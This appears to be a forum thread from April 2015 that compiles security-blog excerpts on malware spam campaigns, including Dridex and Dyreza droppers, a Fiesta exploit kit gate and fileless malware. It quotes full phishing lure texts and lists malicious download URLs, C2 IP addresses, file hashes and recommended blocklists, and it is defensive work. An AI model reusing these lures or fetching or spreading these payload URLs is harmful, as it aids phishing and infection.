bilbaopisos .es: 216.119.143.194: https://www.virustotal.com/en/ip-address/216.119.143.194/information/
- http://blog.mxlab.eu/2015/04/23/url-in-fake-email-from-hsbc-payment-advice-leads-to-obfuscated-malicious-javascript/
Apr 23, 2015
wadv.com .br: 54.191.242.215: https://www.virustotal.com/en/ip-address/54.191.242.215/information/
> https://www.virustotal.com/en/url/ba7f9c3bd4cf9272d3651cca891c220dbec01c4359f417eece31c9eb4a09ac0b/analysis/
___
Fake 'New document' SPAM - malware
- http://blog.dynamoo.com/2015/04/malware-spam-new-document-with.html
22 Apr 2015 - "I have only seen one sample of this -spam- so far, it is likely that other variants use different company names:
From: Tamika Cortez
Date: 22 April 2015 at 14:33
Subject: New document with ID:G27427P from RESTAURANT GROUP PLC was generated
New report with ID:G27427P was generated by our system. Please follow the link below to get your report.
Download report ID:G27427P
Best regards ,Tamika Cortez
RESTAURANT GROUP PLC
In this case, the link in the email goes to: http ://igruv.tourstogo .us/oalroshimt/fokreeshoo/thovoaksij?arg1=victim@victimdomain.com&arg2=G27427P.vbs&arg3=RESTAURANT%20GROUP%20PLC
..which includes the -victim's- email address in the URL. In turn, this -redirects- to:
http ://igruv.tourstogo .us/oalroshimt/fokreeshoo/thovoaksij/files/G27427P.vbs
As the name suggests, this is a VBScript (VT 1/56*), in this case it is lightly obfuscated... and it initiates a download from:
http ://185.91.175.183/ sas/evzxce.exe
..which is saved as %TEMP%\jhvwrvcf.exe. The download location is 176.31.28.226 (OVH, France). This file has a VirusTotal detection rate of 6/57**. Automated analysis tools... show network connections to the following IPs:
144.76.73.3 (Hetzner, Germany)
5.44.216.44 (Camelhost SIA, Latvia)
62.210.214.249 (Iliad Entreprises / Poney Telecom, France)
89.184.66.18 (Invest Ltd, Ukraine)
... it drops a Dridex DLL with a detection rate of 3/57***.
Recommended blocklist:
176.31.28.226
144.76.73.3
5.44.216.44
62.210.214.249
89.184.66.18 ..."
* https://www.virustotal.com/en/file/1af0aba2c2f840f7e00691679900e9bbbd1c7e0b85d54baa80e5b8b6e9424c43/analysis/1429710473/
** https://www.virustotal.com/en/file/1dbcf2fe7118b807a66bdc94512049b49de1f2aa6fb5b109fb1fe6d8a059a68b/analysis/1429710529/
*** https://www.virustotal.com/en/file/8170c29309c2c0a691dddf649973e0c40aff93ad64018864e8911803c28ea35d/analysis/1429711770/
___
IRS Spam
- http://threattrack.tumblr.com/post/117024679123/irs-spam
Apr 21, 2015 - "Subjects Seen
Your FED TAX payment (ID:X3ZIRS507273813) was Rejected
Typical e-mail details:
*** PLEASE DO NOT RESPOND TO THIS EMAIL ***
Your federal Tax payment (ID: X3ZIRS507273813), recently sent from your checking account was returned by the your financial institution.
For more information, please download attached notification. (Security Adobe PDF file)
Transaction Number: X3ZIRS507273813}
Payment Amount: $ 5478.41
Transaction status: Rejected
ACH Trace Number: 8888888888
Transaction Type: ACH Debit Payment-DDA
Internal Revenue Service
Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785.
Malicious File Name and MD5:
FEDERAL_tax_notify.exe (344afdc58ad6d110f1b3f8dbdbb86576)
Screenshot: https://40.media.tumblr.com/18d2466dbc75a3d74236ca52577432cc/tumblr_inline_nn6c1csfLG1r6pupn_500.png
Tagged: IRS, Ruckgov
:fear: :mad:
AplusWebMaster
2015-04-23, 13:23
FYI...
Fake 'Refund on Order' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/refund-on-order-204-2374256-3787503-amazon-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
23 Apr 2015 - "'Refund on order 204-2374256-3787503' pretending to come from Amazon .co.uk <payments-messages@ amazon .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Refund-on-order-204-2374256-3787503.png
23 April 2015 : 204-2374256-3787503-credit-note.doc - Current Virus total detections: 4/54*
... the malicious macro inside this example downloads myshland .com/42/335.exe which is saved and run as %Temp%\pierre5.exe (Virus Total**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ce15debd4312acf2f6546c1bab4287cd410ed82e021f55d051634e6a416ad11a/analysis/1429773545/
** https://www.virustotal.com/en/file/f5720136e987a0826a0ca2b45de3bcb880be3b055ea96f60e4ef06193047596d/analysis/1429775442/
- http://blog.dynamoo.com/2015/04/malware-spam-refund-on-order-204.html
23 Apr 2015
... Recommended blocklist:
185.12.95.191
87.236.215.151
94.23.171.198
185.35.77.250
149.154.64.70 ..."
___
Fake 'Annual report' SPAM - PDF malware
- http://myonlinesecurity.co.uk/annual-report-olivia-cdc-co-uk-fake-pdf-malware/
23 Apr 2015 - "'Annual report' pretending to come from olivia <olivia@ cdc .co.uk> with a zip attachment is another one from the current bot runs...The email looks like:
Hi,
Annual report sent to you, maybe yours.
CDC Consulting
Algyr le parc
119 BL de la Bataille de Stalingrad
69100 Villeurbanne
23 April 2015: Annual report.zip: Extracts to: Luk22.exe
Current Virus total detections: 4/56* . This Annual report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/82d8e65a75e3d955d2fd850f4a7a17b31a4dc74660f664d15f1af42e7b3c2a3a/analysis/1429792521/
... Behavioural information
TCP connections
23.253.254.67: https://www.virustotal.com/en/ip-address/23.253.254.67/information/
81.7.109.65: https://www.virustotal.com/en/ip-address/81.7.109.65/information/
95.80.123.41: https://www.virustotal.com/en/ip-address/95.80.123.41/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
- http://threattrack.tumblr.com/post/117166725758/annual-report-spam
Apr 23, 2015
Tagged: Annual Report, Upatre, Dyreza
___
eFax Spam
- http://threattrack.tumblr.com/post/117170679183/efax-spam
Apr 23, 2015 - "Subjects Seen:
You have a new eFax from 977-374-7446 - 4 pages
Typical e-mail details:
eFax Message [Caller-ID: 977-374-7446]
You have received a 3 pages fax on Thu, 23 Apr 2015 08:20:40 -0600 .
You can view your eFax online, in PDF format, by visiting :
efax .com/documents/view_fax.aspx?utm_source=eFax&fax_type=doc&caller_id=977-374-7446
* This fax’s reference # is 50184025
Malicious URLs
91.194.254.239/fax_33663232.pdf.zip
Malicious File Name and MD5:
pdf_fax_33663232.pif (fe6e9444534f34f735fa94eb7c526207)
Screenshot: https://36.media.tumblr.com/b8f64613505e316d4568ed3a777acb81/tumblr_inline_nn9k9cJQc61r6pupn_500.png
91.194.254.239: https://www.virustotal.com/en/ip-address/91.194.254.239/information/
Tagged: eFax, Dyreza
:fear: :mad:
AplusWebMaster
2015-04-24, 13:47
FYI...
Fake 'Invoice' SPAM - malicious PDF attachment
- http://myonlinesecurity.co.uk/invoice-519658-colin-fox-pdf-malware/
24 Apr 2015 - "'Invoice 519658' pretending to come from Colin Fox <colin@nofss .co .uk> with a PDF attachment is another one from the current bot runs... This email contains a genuine PDF which has embedded -scripts- that will infect you. So far none of the automatic analysis tools can find any malicious content but it is trying to send multicast messages... this evil pdf when opened in Adobe reader drops a word document containing macros, so DO NOT SAVE OR OPEN THIS PDF FILE: Just -delete- the email and any attachment as soon as it appears in your inbox. There appear to be several different versions of the PDF malware dropper although all are named the same and every copy that I have seen is the same file size (23kb) The malicious Macro inside the dropped word document (VirusTotal*) from one of the malicious PDF downloads and executes -> http ://bepminhchi .com/83/61.exe (virus total**)... Adobe reader in recent versions has 'Protected view' automatically -enabled- and unless you press the button to enable all features, you will be safe from this attack...
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/pdf-protected-view.png
If you do enable all features, then you have a second chance to protect yourself, by pressing either cancel or never allow opening files of this type on the pop up warning. Pressing allow WILL almost certainly automatically open the word doc and run the malicious macro so infecting you. Make sure Adobe reader ( or any other PDF reader software) is updated to the -latest- version to protect you. Older versions are vulnerable to these attacks. If using Adobe make sure you -uncheck- any additional offerings of security scans/Google chrome or toolbars that it wants to include in the download:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/doc4.png
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Invoice-519658.png
24 April 2015: Sales Invoice 519658.pdf - Current Virus total detections: 2/57***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0a6e5154f6ce5ca566d3cdcbd5f5ed4ae8c5922d12eb8592595e7455f793596a/analysis/1429860267/
** https://www.virustotal.com/en/file/86d5ea371b13ad40d85957bf2e6b1883c3c413f1689a281ef4fbca7f89cb1fbc/analysis/1429860321/
... Behavioural information
TCP connections
185.12.95.191: https://www.virustotal.com/en/ip-address/185.12.95.191/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
*** https://www.virustotal.com/en/file/5b7d4e88f901f5a7519b3f3ecaf8594d7366fec6f3b4acaf51a1a5175996b4d9/analysis/1429858901/
bepminhchi .com: 115.146.126.39: https://www.virustotal.com/en/ip-address/115.146.126.39/information/
- http://blog.dynamoo.com/2015/04/malware-spam-colin-fox-colinnofsscouk.html
24 Apr 2015
... Recommended blocklist:
185.12.95.191
149.154.64.70
78.24.218.186
89.28.83.228 "
___
Fake 'Western Order' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-pidwell-nigel.html
24 Apr 2015 - "The spam email is not from SSE Contracting, but is instead a simple forgery with a malicious attachment:
Screenshot: https://4.bp.blogspot.com/-VMHqpJpfhpg/VToci4IngnI/AAAAAAAAGko/vtIf6VcuCgo/s1600/sse-enterprise.png
So far I have only seen one sample Western Order.doc [VT 4/57*] which contains a malicious macro... which is functionally identical to the one used in this spam run** which was also happening this morning."
* https://www.virustotal.com/en/file/e6dfcf8ca155e5d2fc448288daaaf4ca3575024b0128ecaa4f25043521427190/analysis/1429871852/
** http://blog.dynamoo.com/2015/04/malware-spam-colin-fox-colinnofsscouk.html
- http://myonlinesecurity.co.uk/western-order-sse-contracting-limited-nigel-pidwell-word-doc-or-excel-xls-spreadsheet-malware/
24 Apr 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Western-Order.png
"... same dridex malware that was dropped by today’s earlier malware run 'Invoice 519658 Colin Fox' – PDF malware*..."
* http://myonlinesecurity.co.uk/invoice-519658-colin-fox-pdf-malware/
___
Fake 'invoice for car repairs' SPAM – PDF malware
- http://myonlinesecurity.co.uk/invoice-for-car-felgen-garage-claus-leykauf-fake-pdf-malware/
24 Apr 2015 - "'invoice for car #' random numbers coming from random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
hi,
The invoice for car repairs.
Gruss, Claus
Claus Leykauf
Galgengasse 14
91257 Pegnitz
Germany
tel.: +49 (0) 9241 724785
fax: +49 (0) 9241 724786
mobile: +49 (0) 172 8801123 ...
24 April 2015: ed0j5av43xs04bk #19641661.zip: Extracts to: car-repairs.exe
Current Virus total detections: 0/58* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c8f889397a67da0043a58073486a718aff55b08a959a359fd5d0d79c14dcd07/analysis/1429872340/
___
Fake 'You win green card' – malware attachment
- http://myonlinesecurity.co.uk/you-win-green-card-malware/
24 Apr 2015 - "'You win green card' pretending to come from USA Green > <random email addresses> with a zip attachment is another one from the current bot runs... The email looks like:
Your requested report is attached here. USA.
24 April 2015: green_card_usa_483273289748923749823798.zip: Extracts to: green_card_usa_483273289748923749823798.exe
Current Virus total detections: 5/56* ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/de70dd9d3c7b992cef1dcf04ca55dbc5945993f2eedc6f72b403724e0af3d96e/analysis/1429873777/
___
Fileless Malware ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
Updated April 22, 2015 - "... It’s no longer enough for malware to rely on dropping copies of themselves to a location specified in the malware code and using persistence tactics like setting up an autostart feature to ensure that they continue to run. Security file scanners can easily block and detect these threats. A tactic we have spotted would be using fileless malware. Unlike most malware, fileless malware hides itself in locations that are difficult to scan or detect. Fileless malware exists only in memory and is written directly to RAM of being installed in target computer’s hard drive. POWELIKS* is an example of fileless malware that is able to hide its malicious code in the Windows Registry. These use a conventional malware file to add the entries with its malicious code in the registry... Another example of fileless malware is “Phasebot,” which we found being peddled in websites that sell malware and other malicious online tools by the supposed malware creator. We detect Phasebot as TROJ_PHASE.A. Phasebot contains -both- rootkit and fileless execution capabilities. We noticed that this malware had the same features as Solarbot**, an old bot that was first seen in the wild around late 2013. This is made more evident when we compared the sites that sold the two malware(s)... Compared to Solarbot, Phasebot places a distinct emphasis on stealth and evasion mechanisms. It -encrypts- its communications to its C&C server by using random passwords each time it connects to the server. The malware was designed to check if the following programs are installed in the affected system:
.NET Framework Version 3.5
Windows PowerShell
... Both of these programs are integrated into current versions of Windows. After verifying that the affected system have these programs, Phasebot creates the following registry key where the encrypted shell code will be written:
HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{Bot GUID}
... Using Windows PowerShell can also be seen as strategic because this tool is included in the initial installation packages of Windows OS versions 7 and higher. And since more users have computers that run on Windows 7 and higher, cybercriminals have a bigger net of potential victims. (And not coincidentally, the targeted .NET framework version 3.5 is also found in Windows 7 and higher)... It’s highly possible that they will not limit themselves to simply using the Windows registry to hide their malware... The emergence of fileless malware can be a serious threat to users who are not familiar with this type of infection. Users are often advised to look for suspicious files or folders, but -not- in places like the Windows registry, which is used for fileless infection... Because fileless malware are hard to detect, they’re also difficult to remove. Much like rootkits, the location of the malware makes detection and deletion more difficult than the typical malware infection..."
* https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TROJ_POWELIKS.A
** http://www.infosecurity-magazine.com/news/napolar-solarbot-trojans-share-dna/
:fear::fear: :mad:
AplusWebMaster
2015-04-27, 14:05
FYI...
Fake 'Invoice' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-1138593-bookingcom-invoice.html
27 Apr 2015 - "This fake invoice email does -not- come from Booking .com but is a simple forgery with a malicious attachment.
From: invoice@ booking .com
Date: 27 April 2015 at 08:55
Subject: [1138593] Booking.com Invoice 01/03/2015 - 31/03/2015
Dear customer,
Herewith you receive the electronic invoice regarding the commissions for the period from 01/03/2015 to 31/03/2015.
If you have any questions, please contact our Credit Control Department at telephone number
+44 (0)208 612 8210 (e-mail: ).
Thank you for working with Booking .com.
The only sample I have seen of this is badly mangled and required some work to extract and decode the attachment invoice-1501383360.doc which has a VirusTotal detection rate of 3/57*. This contains a malicious macro... which downloads a component from the following location:
http ://voipconcerns .com/62/927.exe
There are probably other slightly different versions of the Word document that download from different locations, however the binary will be the same. This malicious executable is saved as %TEMP%\zigma2.5.exe and has a VirusTotal detection rate of 2/57**. Automated analysis tools... show an attempted network connection to:
185.12.95.191 (RuWeb CJSC, Russia)
According to the Malwr report it also drops a malicious Dridex DLL with a detection rate of 4/57***..."
* https://www.virustotal.com/en/file/17d4aeca44259e84b2d7556b0e96b3a8a54bef816881bf796ab994cb1963efb0/analysis/1430122282/
** https://www.virustotal.com/en/file/77b1019db74ef3208cb38b6f213cd7725e9a2573019e60bb5358f7e2245cd74d/analysis/1430122455/
*** https://www.virustotal.com/en/file/86389f29e5421249163650f6fcb3a5943b5bf78e8cdc0b32c9a0d525851250ca/analysis/1430123480/
185.12.95.191: https://www.virustotal.com/en/ip-address/185.12.95.191/information/
voipconcerns .com: 174.37.237.228: https://www.virustotal.com/en/ip-address/174.37.237.228/information/
- http://myonlinesecurity.co.uk/1138593-booking-com-invoice-01032015-31032015-word-doc-or-excel-xls-spreadsheet-malware/
27 April 2015 - " invoice-1501383360.doc - Current Virus total detections: 3/56*
... which connects to and downloads tom-lebaric .com/62/927.exe which is saved as %Temp%\zigma2.4.exe and automatically run ( VirusTotal*)..."
* https://www.virustotal.com/en/file/8f9dcb357facd7484c5ca3ada7174db8da7e4174d097ec7434318a0e2e51d2f0/analysis/1430121196/
tom-lebaric .com: 176.223.208.22: https://www.virustotal.com/en/ip-address/176.223.208.22/information/
___
Fake 'Hello' SPAM - malware attached
- http://myonlinesecurity.co.uk/hello-can-you-please-check-the-attachment-that-i-have-sent-i-need-your-help-rob-robichaud-fake-pdf-malware/
27 Apr 2015 - "An email saying 'Hello! Can you please check the Attachment that I have sent? I need your help' with the subject of 'HI your name@ your domain' coming from random email addresses with a zip attachment is another one from the current bot runs...The email looks like:
Hello! Can you please check the Attachment that I have sent? I need your help.
Thanks
Rob Robichaud
Hub City Auto Paints and Supplies Ltd.
A Division of Autochoice Parts & Paints
CSR
153 Loftus St
Moncton, NB ...
Each email has a random named attachment that is named after your email address. All extract to different named files with different #
27 April 2015: derek- #52256657.zip: Extracts to: LOG.exe
Current Virus total detections: 2/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/35c61632968387b136d9fe7e56ed7927688884748b71796072e639a9ce9691cf/analysis/1430135783/
... Behavioural information
TCP connections
176.106.122.31: https://www.virustotal.com/en/ip-address/176.106.122.31/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
UDP communications
191.233.81.105: https://www.virustotal.com/en/ip-address/191.233.81.105/information/
___
Fake 'Your account #513457796162 has been blocked' SPAM – malware attachment
- http://myonlinesecurity.co.uk/pauletta-stile-your-account-513457796162-has-been-blocked-malware/
27 April 2015 - "'Your account #513457796162 has been blocked' pretending to come from Pauletta Stile with a zip attachment is another one from the current bot runs... The email looks like:
Your account #513457796162 was blocked for violation of our TOS.
Please see attached.
Pauletta Stile
Langenbacherstr. 25 57586 Weitefeld
GERMANY
+49 2743 80 70
Weitefeld
+49 2743 00 03 56
I have only received 1 copy of this malware so far. The last time a similar one was spammed out, we saw them coming form random email addresses with random subject numbers and attachment numbers.
27 April 2015: 513457796162.zip: Extracts to: 513457796162.scr
Current Virus total detections: 1/31*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an Excel spreadsheet instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9de0c4fa110b430178b3f8c2b0d3f416f5c1deebcd646ea935c346d492ed1d94/analysis/1430140877/
... Behavioural information
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
- http://threattrack.tumblr.com/post/117526410988/account-blocked-spam
April 27, 2015
Tagged: Account Blocked, dalexis
___
Incoming Fax Spam
- http://threattrack.tumblr.com/post/117523874753/incoming-fax-spam
Apr 27, 2015 - "Subjects Seen
Incoming Fax
Typical e-mail details:
INCOMING FAX REPORT
*********************************************************
Date/Time: Mon, 27 Apr 2015 08:08:50 -0800
Speed: 4985bps
Connection time: 05:08
Pages: 5
Resolution: Normal
Remote ID: 638-493-5566
Line number: 9
DTMF/DID:
Description: Internal only
To download / view please download attached file
*********************************************************
Malicious File Name and MD5:
IncomingFax.exe (784f8d6818cd23dd18c8f059a6b5d3d5)
Screenshot: https://40.media.tumblr.com/ab71c25233e66668c08d5bfac5f56474/tumblr_inline_nnh35e2GXA1r6pupn_500.png
Tagged: Fax, Dyreza
___
Fake 'Invoice 215042210' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/invoice-215042210-from-front-range-wholesale-restaurant-supplies-inc-word-doc-or-excel-xls-spreadsheet-malware/
27 Apr 2015 - "'Invoice 215042210 from FRONT RANGE WHOLESALE RESTAURANT SUPPLIES INC.' pretending to come from “FRONT RANGE WHOLESALE RESTAURANT SUPPLIES INC.” <replyTo@ quickbooks .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Customer :
Your invoice is attached. Please remit payment at your earliest
convenience.
Thank you for your business – we appreciate it very much.
Sincerely,
FRONT RANGE WHOLESALE RESTAURANT SUPPLIES INC.
27 April 2015 : Inv_215042210_from_FRONT_RANGE_WHOLESALE_RESTAURANT_SUPPLIES_INC._5316.doc
Current Virus total detections: 2/57* which connects to and downloads 91.194.254.240 /us274/file.exe which in turn is saved as %Temp%\rramcgaq.exe and automatically runs... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d124d7db61728092a43c0f59c9af63bdf2e85ed732047ce7c19c63ed6e55d2b1/analysis/1430143720/
91.194.254.240: https://www.virustotal.com/en/ip-address/91.194.254.240/information/
:fear::fear: :mad:
AplusWebMaster
2015-04-28, 11:35
FYI...
Fake 'Privacy Policy' SPAM – malware
- http://myonlinesecurity.co.uk/re-hello-privacy-policy-database-of-contributors-malware/
28 April 2015 - "An email in garbled English about a database of contributors and their Privacy Policy with a subject of 'RE: Hello' pretending to come from Chanda <faucibus.id@ aliquet .com> with a zip attachment is another one from the current bot runs... The email looks like:
Hello!
Dear user! We consider a database of contributors and we found that we have signed with you our “Privacy Policy” and that we have an updated CV. We will be audited in the near future, and we need to update the record. For this reason, is attached to this e-mail confidentiality agreement that we pray thee firm and return them by email or fax as soon as possible. We also need you, please send us your resume updated for inclusion in the database. If you have any questions, please contact me.
With great respect !
28 April 2015: Privacy Policy.zip: Extracts to: Privacy Policy.doc.scr
Current Virus total detections: 6/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will pretend to be a word doc instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/92d6b2733e41e75890e27046990fb98bd212d9e46e65c2bbf0419e3f6317e28a/analysis/1430201347/
... Behavioural information
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
___
Fake 'INVOICE PD' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-invoice-pd-will-comm.html
28 April 2015 - "This malicious spam does not come from Will Communications but is instead a simple -forgery- with a malicious attachment.
From: richard will [contactwill@ hotmail .com]
Date: 28 April 2015 at 09:05
Subject: INVOICE PD Will Comm
Thank-you for your payment!
Richard Will
Will Communications, Inc.
richard@ willcommunications .com
The samples that I have seen are all corrupted, and the malicious attachment just appears as a jumble of Base 64 encoded text, although this may not be the case with every email. After extraction, the malicious Word document has a detection rate of 4/56* and it contains this malicious macro... In this case, the macro downloads a component from:
http ://massachusettsselfstorage .com/62/927.exe
..this is saved as %TEMP%\johan3.2.b.exe and has a detection rate of 3/53**. There may well be other documents that download from -other- locations, but the binary will be the same in all cases. Automated analysis tools... show that it attempts to communicate with the following IP:
185.12.95.191 (RuWeb CJSC, Russia)
According the the Malwr report it drops a malicious Dridex DLL with a detection rate of 2/56***."
* https://www.virustotal.com/en/file/09340206e6df0c53f75a902316a4fdb7b4bf24cfb9fcfae9d08b6f86e486bde3/analysis/1430209748/
** https://www.virustotal.com/en/file/5de0a2e35d38b7a3105395e828e5e742acb3e5842cdcf79913b9e8af19efa263/analysis/1430209765/
*** https://www.virustotal.com/en/file/a03e5bc6b9ee5d13da387a25dfc1a875cc5357d317053909977d97f545c0d3af/analysis/1430210575/
massachusettsselfstorage .com: 209.114.42.129: https://www.virustotal.com/en/ip-address/209.114.42.129/information/
- http://myonlinesecurity.co.uk/invoice-pd-will-comm-word-doc-or-excel-xls-spreadsheet-malware/
28 April 2015 : Orion_PD_INV_12138.doc - Current Virus total detections: 4/54* downloads & executes http ://muebleseviajan .com/62/927.exe ..."
* https://www.virustotal.com/en/file/cc3012425784e128224efcd0f4bf237d33cd0b65deeb53241e39c00c56917197/analysis/1430207999/
muebleseviajan .com: 185.14.56.96: https://www.virustotal.com/en/ip-address/185.14.56.96/information/
___
Bad Actor using Fiesta exploit kit
- https://isc.sans.edu/diary.html?storyid=19631
2015-04-28 - "... a criminal group using the Fiesta exploit kit (EK) to infect Windows computers... The group is currently using a gate that generates traffic from compromised websites to a Fiesta EK domain. I'm calling this group the "BizCN gate actor" because all its gate domains are registered through Chinese registrar www .bizcn .com, and they all reside on a -single- IP address... Earlier this month, the BizCN gate actor changed its gate IP to 136.243.227.9 [3]. We're currently seeing the gate lead to Fiesta EK on 205.234.186.114. Below is a flow chart for the infection chain:
> https://isc.sans.edu/diaryimages/images/2015-04-28-ISC-diary-image-01.jpg
... Passive DNS on 136.243.227.9 shows at least 100 domains registered through www .bizcn .com hosted on this IP address. Each domain is paired with a -compromised- website... Since their information is now public through this diary entry, the actor will likely change the gate's IP address and domains again. Unless there's a drastic change in their pattern of operations, this BizCN gate actor will be found relatively soon after any upcoming changes..."
3] http://urlquery.net/search.php?q=136.243.227.9
205.234.186.114: https://www.virustotal.com/en/ip-address/205.234.186.114/information/
136.243.227.9: https://www.virustotal.com/en/ip-address/136.243.227.9/information/
___
Fake 'NatWest' SPAM – chm malware
- http://myonlinesecurity.co.uk/natwest-secure-message-jp-morgan-access-secure-message-rbs-re-incident-im03359643-chm-malware/
28 Apr 2015 - "'NatWest Secure Message' pretending to come from NatWest .co.uk <secure.message@ natwest .com> with a zip attachment that extracts to a malicious chm (windows help file) is another one from the current bot runs... The email looks like:
You have received a secure message.
Read your secure message by opening the attachment, SecureMessage.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 3532.
First time users – will need to register after opening the attachment...
There is also a separate set of emails being spammed out with the -same- malware attachment with a subject of 'JP Morgan Access Secure Message' pretending to come from JP Morgan Access <service@ jpmorgan .com>...
Please check attached file(s) for your latest account documents regarding your online account.
Russel Whitlock
Level III Account Management Officer
817-267-1542 office
817-573-8940 cell
Russel.Whitlock@ jpmorgan .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
2015 JPMorgan Chase & Co...
All of these use random names at the relevant banks...
Update: there is a second set of these being spammed out with a plain chm attachment that is -not- inside a zip. Outlook (and some other email clients) block chm files by default so you will be protected from automatically opening or running this.
Todays Date: SecureMessage.zip: Extracts to: SecureMessage.chm
Current Virus total detections: 1/53* . The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/467f6d76802014ab671fa868b9b81b79497889f906c434620742e391aee17670/analysis/1430217439/
SecureMessage.chm
___
Fake 'BACS payment' SPAM – PDF malware
- http://myonlinesecurity.co.uk/sales-hello-please-find-downloaded-notification-of-your-bacs-payment-from-essex-county-council-fake-pdf-malware/
28 Apr 2015 - "An email saying 'Please find downloaded notification of your BACS payment from Essex County Council' with a subject of 'Hello (your email address)' pretending to come from sales with a zip attachment is another one from the current bot runs... The email looks like:
Please find downloaded notification of your BACS payment from Essex County Council.
If you require further information please refer to the contact details in the attached document.
BACS Remittance Advice generated automatically by 2e2 on behalf of Essex County Council.
Paramat 60
85 rue des jacobins
60740 Saint maximin
Tel : 03.44.66.03.47
28 April 2015: Random Attachment zip name: Extracts to: INVOICE.exe
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/817bf392cf2a10fee49ff72c04f03ae8ccfa15f434c6cca75a247cc5ca725f07/analysis/1430219199/
... Behavioural information
TCP connections
166.78.246.145: https://www.virustotal.com/en/ip-address/166.78.246.145/information/
81.7.109.65: https://www.virustotal.com/en/ip-address/81.7.109.65/information/
188.255.252.242: https://www.virustotal.com/en/ip-address/188.255.252.242/information/
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
___
Fake 'Email Locked' SPAM - contains trojan
- http://blog.mxlab.eu/2015/04/28/email-issue-243061763d7f320-account-735811402519-temporarily-locked-contains-trojan/
Apr 28, 2015 - "... intercepted a new trojan distribution campaign by email with the subject “ Account #735811402519 Temporarily Locked”. Different spoofed addresses are used a from email address and with each email, the content and the attached trojan is -different- to avoid detection by virus engines. Some examples:
[i] Dear user,
We detect unauthorized Login Attempts to your ID #735811402519 from other IP Address.
Please re-confirm your identity. See attached docs for full information.
Evie Maccarter
King Yvonne M Dr
70 Exhibition Street, Kentville, NS B4N 4K9
CANADA
902-602-7131
The attached file 735811402519.zip contains the 102 kB large file 735811402519.scr. The trojan is known as UDS:DangerousObject.Multi.Generic, Heur.I or Trojan.Win32.Qudamah.Gen.3. At the time of writing, 3 of the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/7c71b6d7318f3754af51b1795cd5190b1e35a40db1862eec9e3600da46de13d7/analysis/1430215524/
___
Scammy Nepal earthquake donation requests
- https://isc.sans.edu/diary.html?storyid=19635
2015-04-28 - "... like after every major hurricane or earthquake, the miscreants around the globe are currently scurrying to set up their -fake- charities and web pages, in order to solicit donations. The people of Nepal certainly can use our help and generosity to deal with the aftermath of the April 25 earthquake, but let's make sure the money actually ends up there. For our readers in the US, USAID.gov maintains a list of charities that they work with in Nepal at http://www.usaid.gov/nepal-earthquake .. but note how even USAID adds a disclaimer to be on the lookout for scams!..."
:fear: :mad:
AplusWebMaster
2015-04-29, 13:03
FYI...
Fake 'pictures' SPAM - malware
- http://myonlinesecurity.co.uk/here-are-some-pictures-malware/
29 Apr 2015 - "An email saying 'Here are some pictures' with a subject of 'RE: Hello' coming from random names and email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Hello!
Here are some pictures !!
See you later!
